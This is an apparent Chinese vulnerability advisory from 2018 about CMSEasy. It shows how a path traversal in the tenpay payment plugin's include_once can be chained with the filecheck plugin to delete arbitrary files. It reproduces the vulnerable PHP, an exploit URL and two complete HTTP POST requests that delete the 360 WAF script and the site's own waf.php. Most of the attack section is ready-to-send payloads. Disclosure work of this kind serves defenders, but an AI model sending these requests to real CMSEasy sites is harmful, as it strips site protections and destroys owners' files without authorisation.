首页 > 漏洞预警和分析 > cmseasy前台包含

cmseasy前台包含

[2018.03.26]

结合刚刚的缺陷注入搭配可高级玩法

漏洞文件:

/lib/plugins/pay/tenpay.php

require_once ("tenpay/PayResponseHandler.class.php");

$resHandler = new PayResponseHandler();

$sp_billno = $resHandler->getParameter("sp_billno");

if(preg_match('/(select|union|and|ÿ|))/i',$sp_billno)){

exit('·Ç·¨²ÎÊý');

}

preg_match_all("/-(.*)-(.*)-(.*)/isu",$sp_billno,$oidout);

$paytype = $where['pay_code'] = $oidout[3][0];

include_once ROOT.'/lib/plugins/pay/'.$paytype.'.php';

前面一段忽略，主要看三处代码

$sp_billno = $resHandler->getParameter("sp_billno");

$paytype = $where['pay_code'] = $oidout[3][0];

include_once ROOT.'/lib/plugins/pay/'.$paytype.'.php';

Getparameter一个类似java get获取的一个自写方法然后再将键位3的值传递与paytype最后直接进行include_once但尴尬是限制了后缀为php但丝毫不影响利用

文件:/lib/plugins/filecheck/action.php

这个文件是不能直接访问的

但是我们这里手握一个文件包含所以嘿嘿

文件中存在着不同不样的功能，比如:

if ($action == 'file_backup') {

if (empty($_POST)) {

$fileList = GetFileList(FROOT, false, true);

$file_list = new stdClass();

$file_list->dirs = $file_list->files = array();

if (is_array($fileList['dir']))

foreach ($fileList['dir'] as $dir) {

if (preg_match(FileBackup::FileNameMath, basename($dir)) > 0)

$file_list->dirs[] = basename($dir);

}

if (is_array($fileList['file']))

foreach ($fileList['file'] as $file) {

if (preg_match(FileBackup::FileNameMath, basename($file)) > 0)

$file_list->files[] = basename($file);

}

if (count($_POST) > 0) {

$backup = new stdClass();

$backup->Success = null;

//TODO array_walk

$files = $_POST['files'];

if (empty($files) == false) {

$make = FileCheckData::MakeData($files);

$backup = FileBackup::BackupFile($files, $make->Time);

}

require FDIR . DS . 'view/file_backup.php';

文件遍历

1.

2. elseif ($action == 'trojan_history') {

3. if (count($_POST) > 0) {

4. //array_walk

5. $_POST['package'] = str_replace(DS . DS, DS, $_POST['package']);

6. if (isset($_POST['delete'])) {

7. TrojanScan::DeletePackage($_POST['package']);

8. }

9. if (isset($_POST['restore'])) {

10. //TrojanScan::RestoreFile($_POST['package'],$_POST['file']);

11. TrojanScan::RestorePackageFile($_POST['package'], $_POST['file']);

12. }

13. }

获取文件后进入一个delete函数

1. static function DeletePackage($package)

2. {

3. $file = FROOT . DS . $package;

4. echo $file;

5. if (file_exists($file))

6. unlink($file);

任意文件删除

这个目录下就是我们打包的文件信息

http://127.0.0.1//cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action

删除360的waf

POST //cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action&action=trojan_history HTTP/1.1

Host: 127.0.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: gzU_msid=tT2FhN;

Connection: close

:

Content-Type: application/x-www-form-urlencoded

Content-Length: 52

&delete=1&package=websca1n360\360safe\360webscan.php

删除自写的waf规则

POST //cmseasy/index.php?case=archive&act=respond&subject=xx-xx-xx-tenpay&sp_billno=1-1-1-../../plugins/filecheck/action&action=trojan_history HTTP/1.1

Host: 127.0.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: gzU_msid=tT2FhN;

Connection: close

:

Content-Type: application/x-www-form-urlencoded

Content-Length: 35

&delete=1&package=\lib\tool\waf.php

业务咨询联系方式：

网络信息安全服务：13581958748 汪经理软件信息系统评测：13811226090 彭经理移动终端设备检测：18611706493 张经理网络系统设备检测：13522983759 路经理传输配套设备检测：13466736366 白经理

友情链接